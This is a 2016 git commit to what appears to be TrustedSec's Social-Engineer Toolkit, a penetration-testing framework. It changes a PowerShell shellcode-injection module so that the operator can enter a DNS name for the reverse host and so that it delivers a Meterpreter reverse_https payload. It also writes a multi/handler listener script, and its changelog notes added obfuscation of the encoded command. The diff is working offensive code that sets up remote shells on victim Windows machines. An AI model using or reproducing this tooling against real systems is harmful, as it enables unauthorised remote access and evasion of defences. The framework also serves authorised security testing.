change powershell injection to DNS name and reverse_https

This commit is contained in:
TrustedSec 2016-09-29 22:10:52 -04:00
parent 8c5cd370ec
commit c0b4a1c128
2 changed files with 6 additions and 3 deletions

View file

@ -4,6 +4,8 @@ version 7.4
* added better obfuscation around encodedcommand
* added new third party module google analytics attack: # https://github.com/ZonkSec/google-analytics-attack. Walkthrough here: http://www.zonksec.com/blog/social-engineering-google-analytics/
* converted alphanumeric shellcode to accept DNS names
* changed alphanumeric shellcode to reverse_https instead of reverse_tcp
~~~~~~~~~~~~~~~~
version 7.3.16

View file

@ -27,7 +27,8 @@ powershell_menu_choice = input(core.setprompt(["29"], ""))
if powershell_menu_choice != "99":
# specify ipaddress of reverse listener
ipaddr = core.grab_ipaddress()
#ipaddr = core.grab_ipaddress()
ipaddr = raw_input("Enter the IPAddress or DNS name for the reverse host: ")
core.update_options("IPADDR=" + ipaddr)
# if we select alphanumeric shellcode
@ -40,7 +41,7 @@ if powershell_menu_choice != "99":
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
with open(core.setdir + "/payload_options.shellcode", "w") as filewrite:
filewrite.write("windows/meterpreter/reverse_tcp {},".format(port))
filewrite.write("windows/meterpreter/reverse_https {},".format(port))
try:
core.module_reload(src.payloads.powershell.prep)
@ -69,7 +70,7 @@ if powershell_menu_choice != "99":
if choice == 'YES':
with open(core.setdir + "/reports/powershell/powershell.rc", "w") as filewrite:
filewrite.write("use multi/handler\n"
"set payload windows/meterpreter/reverse_tcp\n"
"set payload windows/meterpreter/reverse_https\n"
"set LPORT {0}\n"
"set LHOST 0.0.0.0\n"
"set ExitOnSession false\n"